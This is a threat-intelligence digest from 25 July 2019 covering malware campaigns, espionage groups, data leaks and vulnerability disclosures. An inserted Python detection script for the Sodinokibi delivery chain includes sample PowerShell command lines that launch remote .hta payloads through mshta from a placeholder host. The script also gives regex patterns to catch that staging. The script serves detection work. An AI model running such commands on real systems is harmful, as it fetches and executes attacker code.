Silobreaker Daily Cyber Digest – 25 July 2019
Russian-made Monokle malware designed to spy on Android devices
- Lookout researchers discovered Monokle malware in 2018 and identified the Russian company Special Technology Centre Ltd (STC) as the author of the spyware. STC is currently sanctioned by the US Government for the support it provided to the GRU during the 2016 US Presidential election.
- The researchers describe Monokle as ‘advanced mobile surveillanceware’, delivered through trojanized versions of legitimate apps which have been selected to primarily target English-speaking users. The infected apps also contain legitimate functions so as not to arouse the victim’s suspicion.
- Monokle possesses RAT functionality and is used to exfiltrate personal data. It also records the screen during device unlock and attempts to compromise a user’s password or PIN. Moreover, it installs attacker-specified certificates that could allow for man-in-the-middle attacks. The researchers stated that the malware is still being actively deployed.
WatchBog malware contains BlueKeep scanner
- Researchers at Intezer discovered a new variant of WatchBog malware that incorporates an RDP scanner to identify machines vulnerable to the BlueKeep exploit. BlueKeep, tracked as CVE-2019-0708, allows an attacker to achieve remote code execution (RCE) on a vulnerable system. The flaw is present in Windows 2000 to Windows Server 2008, and Windows 7.
- At present no public PoC exists for an RCE attack using CVE-2019-0708. The inclusion of the BlueKeep scanner can nevertheless be useful to attackers who wish to prepare a list of systems that could become exploitable in the future, or who could sell the list of vulnerable machines to a third party.
- The researchers commented on the high pace at which the malware authors are developing WatchBog. At present the malware also includes exploits for CVE-2019-11581, CVE-2019-10149, CVE-2019-0192, CVE-2018-1000861, and CVE-2019-7238.
WeTransfer abused to evade email gateways
- Researchers at Cofense discovered a wave of phishing attacks targeting major industries by using the file-hosting site WeTransfer to deliver malicious URLs.
- The attackers use compromised email accounts to send a genuine link to a WeTransfer-hosted file, allowing the message to bypass security measures. The link redirects the victim to the WeTransfer download page, where an HTM or HTML file is hosted. Once the victim downloads and opens this file, they are redirected to the main phishing page, which asks for Office 365 credentials.
BSI issues warning over new Sodinokibi ransomware campaign
- The German national cybersecurity authority, BSI, has issued a warning related to a malspam campaign that has been observed distributing the Sodinokibi ransomware via emails created to appear as official BSI correspondence. The emails use the subject line ‘Warnmeldung kompromittierter Benutzerdaten’, which translates to ‘Warning message of compromised user data’.
- Infection occurs when the target launches a Windows shortcut that poses as a PDF document inside the ZIP attachment. Upon execution, the shortcut launches a remote HTA file using a PowerShell command that prepends ‘http’ to the URL of the domain hosting the HTA payload.
- Sodinokibi encrypts the victim’s files, appends random extensions to them and drops ransom notes containing unique keys and links to the payment site, which demands $2,500 worth of Bitcoin, rising to $5,000 if the two-day timer expires.
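As an added illustration (not from the digest or the BSI advisory), the following Python checks process-creation records for the PowerShell-to-HTA staging pattern described above. It assumes the scheme is prepended by quoting ‘http’ separately from the rest of the URL in the command line, and the sample records are constructed.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation records for illustration (not from the digest
# or from the BSI advisory); the fields mirror a typical EDR/Sysmon event.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # benign: a scheduled maintenance script
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1",
    },
    {   # suspicious: scheme prepended to a scheme-less URL, then an .hta run
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -w hidden -c \"$u='http'+'://example.invalid/warn.hta';mshta $u\"",
    },
    {   # suspicious: plain URL to a remote .hta payload
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -w hidden -c \"Start-Process mshta http://example.invalid/notice.hta\"",
    },
]

HTA_REF = re.compile(r"\.hta\b", re.IGNORECASE)
FULL_URL = re.compile(r"https?://", re.IGNORECASE)
# 'http' quoted separately from '://' so no full URL literal appears in the line
SPLIT_SCHEME = re.compile(r"['\"]https?['\"]\s*\+\s*['\"]://", re.IGNORECASE)


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a detection label for a PowerShell launch that stages an .hta,
    or None when the record does not match."""
    if not event["Image"].lower().endswith("powershell.exe"):
        return None
    cmd = event["CommandLine"]
    if not HTA_REF.search(cmd):
        return None
    if SPLIT_SCHEME.search(cmd):
        return "hta-split-scheme"   # scheme assembled at runtime, as in the campaign
    if FULL_URL.search(cmd):
        return "hta-remote-url"
    return None


def scan(events: List[Dict[str, str]]) -> List[tuple]:
    """Return (index, label) for every event that classify() flags."""
    labelled = ((i, classify(e)) for i, e in enumerate(events))
    return [(i, label) for i, label in labelled if label]
```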
Shade ransomware paired with Spelevo EK in click fraud campaign
- Researchers at Cybereason observed malicious actors targeting Japanese victims by using the Spelevo exploit kit (EK) in combination with Shade ransomware to perform click fraud.
- The infection mechanism is similar to that observed with the Fallout EK: users visit an infected website and are silently redirected to the EK’s landing page. The infected website is a supposedly legitimate TV service website, which is a change from the usual adult content websites.
- This campaign shows a deviation in the use of Shade, as the malware is usually deployed as ransomware. Click fraud is seen as a popular and quiet way for attackers to earn money, and Cybereason research has found click fraud to be increasing by 50% every year.
Far right group uses dark web database to dox opponents
- Krebs on Security reported that almost three dozen journalists, as well as others, have been targeted by a far-right group that maintains a dark web database containing the personal information of those it regards as opposing its views. The group encourages the harassment of those in its database and has claimed responsibility for several bomb threats and ‘swatting’ incidents.
- The site is named ‘Doxbin’, and contains the names, addresses, phone numbers, IP addresses, dates of birth and further sensitive information of hundreds of people including targets’ friends and families. Over 400 entries are for journalists, in addition to federal judges and executives at major corporations.
- Many on the list have been targeted by threats and harassment, including computer technician Carey Holzman, who was swatted after his details appeared on Doxbin and was threatened via phone calls several times. Doxbin is tied to an open IRC chat in which the members discuss alt-right and racist ideas, doxing and swatting, and share audio and video news recordings of their attacks.
Major companies targeted by Winnti Group
- An investigation by German broadcasters BR and NDR into Winnti Group found that at least six DAX corporations were targeted in its ongoing campaign, including Siemens, BASF, and Henkel. Other targeted companies include Roche, Marriott, Lion Air, Covestro, Sumitomo Group and Shin-Etsu Chemical Group.
- Winnti Group, active since at least 2011, uses Winnti malware to spy on corporate networks and is believed to originate from China. More than 250 variants of Winnti malware were discovered, each containing the names of the global corporations it targeted. During the early stages of the campaign in 2011, the threat actors focused on cybercrime, making money from game manufacturers, whereas the second phase, starting in 2014, shifted towards industrial espionage. The researchers also found evidence of possible political espionage.
- According to Reuters, Siemens, Henkel and Roche confirmed they were targeted by Winnti, whilst BASF and Covestro confirmed they suffered an attack. All companies stated that no sensitive information was lost during the attacks.
“Operation LagTime IT” targets government Information Technology agencies in East Asia
- Proofpoint researchers observed a targeted spear phishing campaign, dubbed ‘Operation LagTime IT’, using malicious RTF documents to deliver custom malware that the researchers have named Cotx RAT. The documents exploit a vulnerability in Microsoft Equation Editor, tracked as CVE-2018-0798.
- The threat actor also uses Poison Ivy payloads which share a similar C2 infrastructure with newly identified Cotx campaigns. The researchers attribute the activity to the Chinese APT TA428 and believe the campaign is similar in operation and tactics to the Maudi Surveillance Operation reported in 2013.
- Since the start of 2019, the campaign has mainly targeted East Asian government agencies responsible for overseeing government IT, domestic affairs, foreign affairs, economic development, and political processes.
APT17 associated with the Jinan bureau of China’s Ministry of State Security
- Cyber security analysts at Intrusion Truth stated that APT17 is likely managed by Guo Lin, an MSS officer from the Ministry’s Jinan Bureau.
- Guo Lin is also associated with several cyber security and technology companies that count the MSS as a client. These companies are linked to two hackers from Jinan and to the authors of APT17’s BLACKCOFFEE malware.
Leaks and Breaches
Over 86 million records exposed in open YouHodler database
- vpnMentor researchers discovered an open database belonging to the cryptocurrency lending platform YouHodler that exposed private information of thousands of individuals.
- Exposed data included users’ full names, email addresses, addresses, phone numbers, dates of birth, as well as full credential details and in some cases crypto wallet addresses, which were stored in plain text on the database.
Sky locks down accounts following detection of credential stuffing attack
- Sky has locked online accounts and advised users to reset their passwords as a safety measure after the telecom company detected a credential stuffing attack last month. Sky stated that the locked accounts had not been breached, and that it is merely a precautionary measure.
Nacho Analytics customers still have access to leaked data via Google Analytics
- Ars Technica revealed on July 18th, 2019, that the data of up to 4.1 million users was collected and made available to the customers of marketing intelligence firm Nacho Analytics. The data was collected by eight Chrome and Firefox browser extensions, which were able to read and copy web links, resulting in the divulgence of personal and corporate information.
- On July 24th, 2019, Ars Technica reported that purchased data could still be accessed by Nacho Analytics customers who had acquired it before the offending extensions and Nacho Analytics were shut down. The data remains accessible because Google Analytics imported the information into those customers’ accounts. Ars Technica reported that this could potentially mean that the browsing data of millions of people remains accessible.
Reports of critical vulnerability in VLC Media Player a false alarm
- Reports that an unpatched critical vulnerability, assigned CVE-2019-13615, exists in VLC Media Player have turned out to be incorrect. The ‘security issue’ that was reported by MITRE was not an issue in VLC Media Player but in a third-party library called libebml. Moreover, the flaw was patched over 16 months ago.
- The vulnerability was not tested by MITRE before a CVE ID was assigned. Following MITRE’s report, Germany’s CERT-Bund issued an alert stating that VLC Media Player was open to exploitation via a critical vulnerability rated 9.8 on the CVSS scale.
- The vulnerability was fixed in VLC 3.0.3; users running any version of VLC since 3.0.3 will not be impacted by the issue.
Stock Trading service Robinhood stored passwords in plain text
- Robinhood emailed impacted customers to inform them that their ‘credentials were stored in a readable format within our internal systems’. The company stated that users should reset their password as a precautionary measure and assured customers that they had no evidence suggesting that unauthorized parties accessed the information.
- Robinhood refused to tell reporters from ZDNet how many users were impacted, but confirmed that it was not an issue that affected all customers.
NinjaRMM used to spread ransomware
- On July 24th, 2019, a malicious actor was able to access a NinjaRMM customer account and deliver malware across multiple endpoints. The company stated that the breach was confined to one NinjaRMM customer and assured customers that the company itself was not breached.
13 vulnerabilities disclosed in Das U-Boot
- On July 22nd, 2019, Semmle disclosed 13 vulnerabilities in the open-source universal boot loader Das U-Boot. The vulnerabilities are exploitable when Das U-Boot is configured to use networking and NFS, which is typically the case during development or in diskless configurations.
- The vulnerabilities could be exploited by an attacker on the same network or one who controlled a malicious NFS server. A successful exploit would allow the attacker to execute code on a U-Boot-powered device.
- U-Boot developers have not released a final patch but a temporary, though not fully tested, patch has been released by Semmle.
Mitsubishi Inverter Engineering Software affected by several vulnerabilities
- Several vulnerabilities have been found in Mitsubishi Electric’s FR Configurator2 inverter engineering software that could potentially be exploited for information disclosure, arbitrary code execution, privilege escalation, and denial-of-service (DoS) attacks.
- One of the vulnerabilities, classified as ‘high severity’, stems from the tool’s XML external entity processing and could allow an attacker to read and steal arbitrary files. Another ‘high severity’ vulnerability is a local privilege escalation flaw that could allow an attacker with low privileges to execute a malicious file with escalated privileges when the application is launched.
- In response, Mitsubishi has released version 1.16S, which patches all of the disclosed vulnerabilities, and has urged its customers to avoid opening files from untrusted sources.
Malwarebytes Labs publishes technical analysis of new Phobos malware
- Malwarebytes Labs has stated that Phobos malware is reportedly based on the Dharma ransomware strain and is likely distributed by the same group. Phobos is distributed via hacked Remote Desktop Protocol (RDP) connections.
- Malwarebytes Labs’ report includes an analysis of the malware’s behaviour, the encryption process, obfuscation techniques, process killing, targets, and more.
DDoS L7/Brute Force Attack targets entertainment company for nearly two weeks
- Imperva recorded an attack against one of their customers in the entertainment industry that lasted for 13 days between April 23rd, 2019, and May 5th, 2019. Attackers utilized a botnet that coordinated 402,000 IPs and at its peak sent 292,000 requests per second to the target site. The attack was the largest Layer 7 DDoS attack that Imperva has recorded.
- The attack originated in Brazil and was masked by using the same legitimate User-Agent as the customer’s service application. Further analysis showed that most of the IPs used in the attack belonged to IoT devices infected with Mirai malware.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.